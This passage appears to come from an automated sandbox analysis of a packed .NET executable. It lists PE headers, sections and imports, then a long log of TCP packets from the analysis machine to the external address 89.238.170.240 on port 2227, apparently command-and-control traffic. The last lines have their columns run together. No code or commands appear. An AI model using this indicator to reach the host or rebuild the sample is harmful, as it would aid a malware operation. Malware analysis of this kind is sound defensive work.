                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 97 times: the bytes after the .NET entry stub are zero padding, and 00 00 disassembles as this instruction)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x83ce9 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x84000 | 0x630 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x827c0 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                                .text   0x2000           0x81d44       0x81e00   False     0.8235044213185756  data       7.48667005978947     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc   0x84000          0x630         0x800     False     0.33837890625       data       3.475912431944506    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc  0x86000          0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                Name         RVA      Size   Type                                                                                     Language  Country  ZLIB Complexity
                                                RT_VERSION   0x84090  0x3a0  data                                                                                                        0.4191810344827586
                                                RT_MANIFEST  0x84440  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                          0.5489795918367347
                                                DLL          Import
                                                mscoree.dll  _CorExeMain
                                                Timestamp                              Source Port  Dest Port    Source IP        Dest IP
                                                Jun 28, 2023 01:59:22.806407928 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.844960928 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.845141888 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.845212936 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.845773935 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.882499933 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.882585049 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.882893085 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.882939100 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.882982969 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.882987022 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.883016109 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.883049011 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.883049011 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.883100986 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.919987917 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920042992 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920083046 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920128107 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920128107 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920129061 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920172930 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920201063 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920201063 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920211077 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920252085 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920255899 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920314074 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920334101 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920368910 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920437098 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920460939 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920566082 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920578003 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920599937 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920651913 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920680046 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920695066 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920778990 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.920795918 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.920890093 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958168030 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958228111 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958261967 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958298922 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958328962 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958340883 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958370924 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958410025 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958424091 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958424091 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958466053 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958467007 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958467007 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958551884 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958592892 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958632946 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958638906 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958640099 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958672047 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958679914 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958679914 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958717108 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958738089 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958755016 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958787918 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958812952 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.958868980 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958915949 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958954096 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.958954096 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.959012032 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.959012032 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.959053040 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.959127903 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.959150076 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.959220886 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.959253073 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.959295988 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.959317923 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.959331036 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.959359884 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.959384918 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.995644093 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.995688915 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.995826006 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.995826006 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.995860100 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.995908022 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996032953 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996061087 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996061087 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996131897 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996242046 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996309042 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996351957 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996391058 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996397972 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996397972 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996397972 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996460915 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996498108 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996572971 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996572971 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996656895 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996690035 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996851921 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996946096 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.996968985 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996968985 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.996980906 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997024059 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997024059 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997083902 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997186899 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997220993 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997278929 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997278929 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997319937 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997319937 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997328997 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997371912 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997414112 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997505903 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997540951 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997612953 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997612953 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997612953 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997653008 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997661114 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997661114 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997699022 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997728109 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997735977 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997767925 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997782946 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997821093 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997824907 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997859955 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997864962 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.997888088 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997931004 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.997981071 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998049021 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998122931 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998155117 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998188019 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998203993 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998203993 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998258114 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998298883 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998333931 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998367071 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998367071 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998395920 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998451948 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998475075 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998511076 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998548031 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998548985 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998579025 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998605013 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998714924 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998759031 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998792887 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998799086 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998828888 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998828888 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998858929 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998864889 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.998910904 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.998910904 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.999032974 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.999090910 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.999109983 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.999161005 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.999171972 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.999209881 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.999244928 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.999267101 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.999268055 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.999279976 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:22.999310017 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:22.999351978 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.033097029 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033138990 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033176899 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033225060 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033252954 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.033266068 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033303976 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033313036 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.033363104 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.033363104 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.033423901 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033494949 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.033622980 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033696890 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.033828020 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.033898115 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.033993006 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.034064054 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.034146070 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.034224033 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.034240961 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.034317970 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.034389973 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.034456015 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.034738064 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.034807920 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.034841061 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.034909010 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.035105944 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.035178900 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.035206079 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.035269976 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.035413027 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.035450935 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.035481930 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.035509109 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.035706043 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.035742044 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.035815001 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.035815001 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036130905 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036207914 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036237955 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036313057 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036315918 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036354065 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036375046 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036396027 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036426067 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036431074 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036457062 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036509991 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036537886 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036572933 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036607027 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.036616087 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036643982 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036665916 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.036988020 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037023067 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037051916 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037064075 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037081957 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037103891 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037138939 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037147045 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037180901 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037183046 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037219048 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037220955 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037246943 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037261009 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037282944 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037331104 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037369967 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037410975 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037445068 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037445068 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037477016 CEST   49692        2227         192.168.2.4      89.238.170.240
                                                Jun 28, 2023 01:59:23.037491083 CEST   2227         49692        89.238.170.240   192.168.2.4
                                                Jun 28, 2023 01:59:23.037527084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037528038 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037561893 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037564993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037611008 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037636995 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037667036 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037712097 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037745953 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037745953 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037775993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037816048 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037847996 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037894011 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037919044 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037946939 CEST22274969289.238.170.240192.168.2.4
